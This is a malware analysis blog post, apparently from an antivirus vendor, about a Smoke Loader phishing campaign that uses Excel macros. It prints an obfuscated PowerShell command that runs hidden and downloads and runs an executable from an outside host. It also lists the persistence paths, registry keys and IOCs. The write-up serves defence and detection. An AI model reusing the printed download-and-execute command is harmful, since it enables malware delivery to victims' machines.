Smoke Loader Malware Campaign Overview
Recently a new malware campaign has been seen targeting Italy right now in which an attacker is sending phishing emails with malicious attachment of .XLSX file.
An attacker has taken the advantage of DDE (Dynamic Data Exchange) feature of Microsoft Excel Spreadsheet.
When the user double-clicks on the attachment (XLSX) file, it opens the Microsoft Excel Spreadsheet & tries to execute the malicious macro code on the victim machine that automatically downloads the payload through PowerShell Scripting Code on the victim’s machine.
Flow Chart:
Get peace of mind! Get rid of malicious programs instantly
Free Checkup & fix for your PC! Get rid of malicious programs instantly!
Technical Analysis of SMOKE LOADER Malware Campaign
File Name: 53802918_f24_26062018.xls
MD5: 8F80EC0EAD35359225A0102D28D851F9
File Type: XLSX
Spread Via: E-mail
Also Read: Detailed Technical Analysis of EMOTET Malware Campaign Attack
Detail Description SMOKE LOADER Malware Campaign with Screenshots
During execution of 53802918_f24_26062018.xls, it’s launch Microsoft Excel application in Protected View Mode.
Figure 1 Enable Content (Macros Disabled)
By default, Microsoft Office Application has turned on the Protected Mode Feature & Also Disabled the Macro’s for security purposes.
In case, if the user disabled the protection mechanism & enabled the macro’s feature then the warning message notification doesn't pop up. And, it will harm your system.
So, it’s always recommended to never disable the protection mode.
In case, if the user clicks on the Enable Content button or doesn’t use Microsoft Default Protected View Mode, the Malicious macro will automatically download the payload into %temp% location with the help of Powershell.exe
%temp%\{Random-ID}.exe
As shown below, Excel.exe creates several processes
Figure 3 Process Tree
As shown below, 53802918_f24_26062018.xls contains jumbled malicious macro which is not clearly understandable by the normal user.
Below macro code has Sub Workbook_Open() function which means opening the excel, the malicious macro code will get activated; if macros are enabled by the user.
Figure 2 Jumbled Macro Code
By debugging the above jumbled macro code, we came to know that it runs the malicious PowerShell script in the background.
Figure 3 During Debugging
CMd /c" POwerSHeLL -nolO -exEcu bypAss -nONI -nOprOFi -wiNd HiDDeN "$7d0mK6 = [TyPE](\"{1}{0}{3}{2}\" -f 'on','ENVIr','Nt','mE') ; do{&(\"{1}{0}\" -f'ep','sle') 33;${D`es} = $7d0mk6::geTFolDeRPAtH(\"Desktop\");(&(\"{0}{1}{2}\" -f'Ne','w-','Object') (\"{0}{2}{1}{3}{5}{6}{4}\"-f'Sy','te','s','m.Ne','ent','t.Web','CLi')).dOwNloADfILE.inVOKE(\"hxxp://cloudphotos.party/fogliodati\",\"$Des\7515685[.]exe\")}while(!${?});&(\"{0}{2}{3}{1}\"-f 'St','ocess','art','-Pr') $Des\7515685.exe"
As shown above, PowerShell script attempts to connect URL, if URL is active, it downloads the payload at C:\Users\admin\Desktop\
Once started it copied itself into %appdata%\Microsoft\Windows\ucbaigjt\cvbesvse.exe
Thereafter, it creates the shortcut link at following location:
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ucbaigjt.lnk
This malware has persistent mechanism capabilities it creates the entries in task scheduler location, so that it runs automatically in every 10 minutes.
C:\Windows\system32\tasks\Opera scheduled Auto update (random ID)
Thereupon, it attempts to connect to their C&C Server (hxxp://cloudmegavideo[.]Bid) to download an additional payload (URSNIF Malware) at following location:
% AppData%\Microsoft\Batmredm\Appxnapi.exe
Appxnapi.exe malware runs automatically by modifying the following registry entry:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\[AxInASDS] %AppData%\Microsoft\Batmredm\Appxnapi.exe
Are you worried about your PC health?
Check your PC Health for Free!
IOC’s
Associated Hash
8F80EC0EAD35359225A0102D28D851F9
856A792E418146BBF302A5AC9AB69FB7
0F499E0BB20EAEE792ED05B85D4A35C7
9F040EE0B7046F39C8A28459841DB2CC
Associated URL
hxxp://cloudphotos.party/fogliodati
hxxp://cloudmegavideo[.]Bid
Associated Registry Entry
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\[AxInASDS] %AppData%\Microsoft\Batmredm\Appxnapi.exe
Tips to Prevent virus and malware from Infecting Your System:
- Enable your popup blocker: Pop-ups and ads on the websites are the most adoptable tactic used by cybercriminals or developers with the core intention to spread malicious programs.
So, avoid clicking uncertain sites, software offers, pop-ups etc. and Install a powerful ad- blocker for Chrome, Mozilla, and IE
- Keep your Windows Updated: To avoid such infections, we recommend that you should always keep your system updated through automatic windows update.By doing this you can keep your device free from virus.According to the survey, outdated/older versions of Windows operating system are an easy target.
- Third-party installation: Try to avoid freeware download websites as they usually install bundled of software with any installer or stub file.
- Regular Backup: Regular and periodical backup helps you to keep your data safe in case the system is infected by any kind of virus or any other infection.Thus always backup important files regularly on a cloud drive or an external hard drive.
- Always have an Anti-Virus: Precaution is better than cure. We recommend that you install an antivirus like ITL Total Security or a good Malware Removal Tool like Download Virus RemovalTool
